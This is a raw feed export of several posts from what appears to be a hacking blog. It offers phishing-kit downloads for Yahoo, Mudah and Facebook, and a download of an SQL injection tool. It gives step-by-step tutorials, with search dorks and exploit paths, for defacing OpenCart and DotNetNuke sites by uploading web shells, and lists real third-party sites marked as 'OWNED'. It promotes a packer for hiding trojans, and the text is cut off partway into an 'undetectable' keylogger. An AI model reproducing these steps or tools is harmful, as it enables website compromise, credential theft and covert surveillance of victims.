1em;"&gt;&lt;img border="0" height="253" src="http://rmreview.com.my/wp-content/uploads/2010/04/MUDAH.MY-PARTNER-PAYPAL-FOR-SAFE-ONLINE-PAYMENT.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;Mudah.my&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;Download Link :&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://www.mediafire.com/?967i8s77aaugs47"&gt;yahoo.zip&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://www.mediafire.com/?hlk0nma89tm623n"&gt;mudah.zip&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://www.mediafire.com/?6zduenzhc36oisz"&gt;facebook.zip&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4138059781742552827-5729240180713882479?l=d3xt-my.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/5729240180713882479/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/fake-site-phishing.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/5729240180713882479'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/5729240180713882479'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/fake-site-phishing.html' title='Fake Site (Phishing)'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-YLBIRPtFi4g/Tsr20wGZD7I/AAAAAAAAAhc/BMmnGqOdTTs/s72-c/1.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4138059781742552827.post-3986268808519731825</id><published>2011-11-21T06:05:00.000-08:00</published><updated>2011-12-14T20:40:26.693-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Havij v1.15 (Advanced SQL Injection Tools)</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and &amp;nbsp;password hashes, dump tables and columns, fetching data from the database, running SQL &amp;nbsp;statements and even accessing the underlying file system and executing commands on the &amp;nbsp;operating system.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://farm5.static.flickr.com/4127/5011289660_b6202cabb4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://farm5.static.flickr.com/4127/5011289660_b6202cabb4.jpg" width="291" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;What's New?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Webknight WAF bypass added.&lt;/li&gt;&lt;li&gt;Bypassing mod_security made better&lt;/li&gt;&lt;li&gt;Unicode support added&lt;/li&gt;&lt;li&gt;A new method for tables/columns extraction in mssql&lt;/li&gt;&lt;li&gt;Continuing previous tables/columns extraction made available&lt;/li&gt;&lt;li&gt;Custom replacement added to the settings&lt;/li&gt;&lt;li&gt;Default injection value added to the settings (when using %Inject_Here%)&lt;/li&gt;&lt;li&gt;Table and column prefix added for blind injections&lt;/li&gt;&lt;li&gt;Custom table and column list added.&lt;/li&gt;&lt;li&gt;Custom time out added.&lt;/li&gt;&lt;li&gt;A new md5 cracker site added&lt;/li&gt;&lt;li&gt;bugfix: a bug releating to SELECT command&lt;/li&gt;&lt;li&gt;bugfix: finding string column&lt;/li&gt;&lt;li&gt;bugfix: getting multi column data in mssql&lt;/li&gt;&lt;li&gt;bugfix: finding mysql column count&lt;/li&gt;&lt;li&gt;bugfix: wrong syntax in injection string type in MsAccess&lt;/li&gt;&lt;li&gt;bugfix: false positive results was removed&lt;/li&gt;&lt;li&gt;bugfix: data extraction in url-encoded pages&lt;/li&gt;&lt;li&gt;bugfix: loading saved projects&lt;/li&gt;&lt;li&gt;bugfix: some errors in data extraction in mssql fixed.&lt;/li&gt;&lt;li&gt;bugfix: a bug in MsAccess when guessing tables and columns&lt;/li&gt;&lt;li&gt;bugfix: a bug when using proxy&lt;/li&gt;&lt;li&gt;bugfix: enabling remote desktop bug in windows server 2008 (thanks to pegasus315)&lt;/li&gt;&lt;li&gt;bugfix: false positive in finding columns count&lt;/li&gt;&lt;li&gt;bugfix: when mssql error based method failed&lt;/li&gt;&lt;li&gt;bugfix: a bug in saving data&lt;/li&gt;&lt;li&gt;bugfix: Oracle and PostgreSQL detection&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Link to Download:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;table align="center" border="1" bordercolor="#969696" id="table1" style="background-color: #eaeaea; border-collapse: collapse; width: 600px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td bgcolor="#ece9ed" width="450"&gt;&lt;/td&gt;&lt;td align="middle" bgcolor="#ece9ed" width="75"&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://www.multiupload.com/10ANXAFDWB" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="30" src="http://itsecteam.com/pic/down.gif" width="25" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Download&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;td align="middle" bgcolor="#ece9ed" width="75"&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://www.multiupload.com/10ANXAFDWB" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="29" src="http://itsecteam.com/pic/down.gif" width="33" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Download&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;How to use:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;This tool is for exploiting SQL Injection bugs in web application.&lt;/div&gt;&lt;div&gt;For using this tool you should know a little about SQL Injections.&lt;/div&gt;&lt;div&gt;Enter target url and select http method then click Analyze.&lt;/div&gt;&lt;div&gt;Note: Try to url be valid input that returns a normal page not a 404 or error page.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;If you need password, go&amp;nbsp;&lt;a href="http://w3.tbd.my/thread-9215-page-5.html"&gt;here&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4138059781742552827-3986268808519731825?l=d3xt-my.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/3986268808519731825/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/havij-v115-advanced-sql-injection-tools.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/3986268808519731825'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/3986268808519731825'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/havij-v115-advanced-sql-injection-tools.html' title='Havij v1.15 (Advanced SQL Injection Tools)'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://farm5.static.flickr.com/4127/5011289660_b6202cabb4_t.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4138059781742552827.post-8415773270135698569</id><published>2011-11-21T05:47:00.000-08:00</published><updated>2011-12-15T01:33:29.934-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Deface'/><title type='text'>[TUT] Deface via OpenCart [TUT]</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://kplab.tuke.sk/hardwiki-uhi/images/9/9b/Opencart-logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://kplab.tuke.sk/hardwiki-uhi/images/9/9b/Opencart-logo.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Actually we using FCKEditor techniques to deface websites, and admin websites are not to CHMOD / Protect their directory .. So, with this interchangeable me access to their directory and use FCKEditor to deface and giving security warning on the webmaster-webmaster .. So, i will show ways to deface websites using the FCKEditor, Follow the step below ..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1) Create your deface file first, using the extension. Html,&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;example deface.html&lt;br /&gt;2) Search on Google, use this dork: Powered by OpenCart.&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;You may also add carian for certain domains, like. Com.&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;Example: Powered by OpenCart site:. Com&lt;br /&gt;3) Exploit BGI OpenCart: / admin / view / javascript / fckeditor / editor / filemanager / connectors / test.html.&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;web search for one by one that has not been patched, and enter the above exploit.&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;Example: www.site.com / admin / view / javascript / fckeditor / editor / filemanager / connectors / test.html,&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;Example 2: www.site.com / cms / admin / view / javascript / fckeditor / editor / filemanager / connectors / test.html&lt;br /&gt;4) Replace the connector: ASP to PHP, select the file, then upload.&lt;br /&gt;5) Ok​​, so deface korang file will be like this.&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;Example: www.site.com / deface.html,&lt;br /&gt;&lt;br /&gt;Website List:&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://bestonlinediscounts.net/ [OWNED]&lt;br /&gt;http://wenrestaurant.com/ [OWNED]&lt;br /&gt;http://ruthsgarden.com/ [OWNED]&lt;br /&gt;http://www.utahflowers.net/ [UNAVAILABLE]&lt;br /&gt;http://www.inlove.my/ [UNAVAILABLE]&lt;br /&gt;http://megamall.com.pk/ [UNAVAILABLE]&lt;br /&gt;http://stefanyboutique.com/ [UNAVAILABLE]&lt;br /&gt;http://www.virtualgeorge.info/ [UNAVAILABLE]&lt;br /&gt;http://iphoneclone.biz/ [UNAVAILABLE]&lt;br /&gt;http://amourcristallis.com/ [UNAVAILABLE]&lt;br /&gt;http://www.eesnet.org/ [UNAVAILABLE]&lt;br /&gt;http://www.schoolshopper.com.au/ [OWNED]&lt;br /&gt;http://www.mymaxi.nl/ [UNAVAILABLE]&lt;br /&gt;http://wiretek.net/ [OWNED]&lt;br /&gt;http://shop.tjokgus.com/ [OWNED]&lt;br /&gt;http://www.aquariumsystem.it/ [UNAVAILABLE]&lt;br /&gt;http://uae-shopper.com/ [UNAVAILABLE]&lt;br /&gt;http://organicjewelries.com/ [OWNED]&lt;br /&gt;http://www.granmasantiques.com/ [OWNED]&lt;br /&gt;http://avocadogenie.com/ [UNAVAILABLE]&lt;br /&gt;http://www.inputandanalysis.com/ [OWNED]&lt;br /&gt;http://eddiegifts.com/ [OWNED]&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4138059781742552827-8415773270135698569?l=d3xt-my.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/8415773270135698569/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/tut-deface-via-opencart-tut.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/8415773270135698569'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/8415773270135698569'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/tut-deface-via-opencart-tut.html' title='[TUT] Deface via OpenCart [TUT]'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4138059781742552827.post-817851010836899676</id><published>2011-11-21T02:22:00.000-08:00</published><updated>2011-12-14T20:40:26.721-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Protection'/><title type='text'>Hide KeyStroke, Trojan &amp; Protect Files</title><content type='html'>&lt;div style="background-color: white;"&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;SoftwarePassport technology protects your Windows or Mac application and expands your global sales capabilities. You can globalize the marketing features of SoftwarePassport by customizing the language strings to any language. It contains powerful features such as flexible server-based licensing and activation, trialware distribution and marketing, in-application purchasing and sophisticated country based licensing to name just a few. Altogether, they enable software publishers like you to grow revenue by:&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;-Protecting your software from piracy&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;-Exposing your products to rapidly expanding global markets&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;-Maximizing the lifetime value of your buyers whether they are consumers, small to mid-size businesses or corporations&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;-Attracting new customers in lucrative and untapped markets&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;How to use :&lt;br /&gt;-Click at the top 'New Projects' &amp;amp; New Windows will opened&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-m200pRMAfdw/TsokTDI7DDI/AAAAAAAAAhM/4vV_j0nk6PI/s1600/test.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;img border="0" height="230" src="http://3.bp.blogspot.com/-m200pRMAfdw/TsokTDI7DDI/AAAAAAAAAhM/4vV_j0nk6PI/s320/test.PNG" width="320" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;-After that, click at '&lt;b&gt;certificates&lt;/b&gt;'&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-Wuw03Wb0Yss/TsolCT4MASI/AAAAAAAAAhU/KVcLNJKIiEA/s1600/test.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-Wuw03Wb0Yss/TsolCT4MASI/AAAAAAAAAhU/KVcLNJKIiEA/s320/test.PNG" width="320" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;-After you have entered the certificates name, close the windows.&lt;br /&gt;-Click at 'Files to Protect', Done with that?&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;-Close the 'New Project' windows.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;-Click 'CTRL+P' &amp;amp; Your files have been successfully Protected.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;Download Files :&lt;br /&gt;&lt;a href="http://www.mediafire.com/?6dtymxo2yzm"&gt;SoftwarePassport Armadillo 5.6&lt;/a&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4138059781742552827-817851010836899676?l=d3xt-my.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/817851010836899676/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/hide-keystroke-trojan-protect-files.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/817851010836899676'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/817851010836899676'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/hide-keystroke-trojan-protect-files.html' title='Hide KeyStroke, Trojan &amp;amp; Protect Files'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-m200pRMAfdw/TsokTDI7DDI/AAAAAAAAAhM/4vV_j0nk6PI/s72-c/test.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4138059781742552827.post-275672993941515310</id><published>2011-11-20T23:02:00.000-08:00</published><updated>2011-12-15T01:41:57.660-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Deface'/><title type='text'>[TUT] Deface via DNN [TUT]</title><content type='html'>&lt;div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://triblocal.com/oak-brook/files/2011/11/logo-chicagodnn-300.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://triblocal.com/oak-brook/files/2011/11/logo-chicagodnn-300.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;DotNetNuke is an open source web content management system based on Microsoft .NET technology.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;DotNetNuke was written in VB.NET, though the developer has shifted to C# since version 6.0.[4] It is distributed under both a Community Edition BSD-style license [3] and commercial proprietary licenses as the Professional and Enterprise Editions. DotNetNuke is extensible and customizable through the use of skins, modules, data providers, language packs and templates.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;All things we need is&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: blue; font-family: inherit;"&gt;-An ASP Shell&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: blue; font-family: inherit;"&gt;-PHPJackal OR C99 Shell&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: blue; font-family: inherit;"&gt;-Some nice Deface pages&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;We will use this Google Dork&lt;/span&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;inurl:fcklinkgallery.aspx&lt;/span&gt;&lt;/blockquote&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;Now you will see lots of websites.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;Pick anyone.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;You will see something like this : &lt;a href="http://www.parkroway.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"&gt;Example 1&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;Click 'File'&amp;nbsp;&amp;amp; Enter this code at address&lt;/span&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;&lt;span class="Apple-style-span" style="color: #274e13; font-family: inherit;"&gt;&lt;b&gt;javascript:__doPostBack('ctlURL$cmdUpload','')&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;Will appear Upload Button &amp;amp; Browse Button&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;Choose Shell &amp;amp; Start Uploading&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;Your shell will store at :&lt;/span&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;http://www.TARGETSITE.com/portals/0/shell name&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="color: red; font-family: inherit;"&gt;Happy Defacing Website :)&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4138059781742552827-275672993941515310?l=d3xt-my.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/275672993941515310/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/tut-deface-via-dnn-tut.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/275672993941515310'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/275672993941515310'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/tut-deface-via-dnn-tut.html' title='[TUT] Deface via DNN [TUT]'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4138059781742552827.post-3909667500895821306</id><published>2011-11-20T22:19:00.000-08:00</published><updated>2011-12-15T01:44:42.653-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Visual Basic'/><title type='text'>Make Undetect Keylogger with Visual Basic 2008/2010</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blogs.msdn.com/blogfiles/danielfe/WindowsLiveWriter/VisualStudio2010ExpressEditionsarenowava_9A8A/image_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="223" src="http://blogs.msdn.com/blogfiles/danielfe/WindowsLiveWriter/VisualStudio2010ExpressEditionsarenowava_9A8A/image_2.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Keystroke logging (often called keylogging) is the action of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored. There are numerous keylogging methods, ranging from hardware and software-based approaches to electromagnetic and acoustic analysis.&lt;br /&gt;&lt;br /&gt;Example :&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://1.gvt0.com/vi/Hz1WCDjaeVE/0.jpg" height="266" width="320"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Hz1WCDjaeVE&amp;fs=1&amp;source=uds" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;embed width="320" height="266"  src="http://www.youtube.com/v/Hz1WCDjaeVE&amp;fs=1&amp;source=uds" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 17px;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;Imports System.Web&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;Imports System.IO&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: 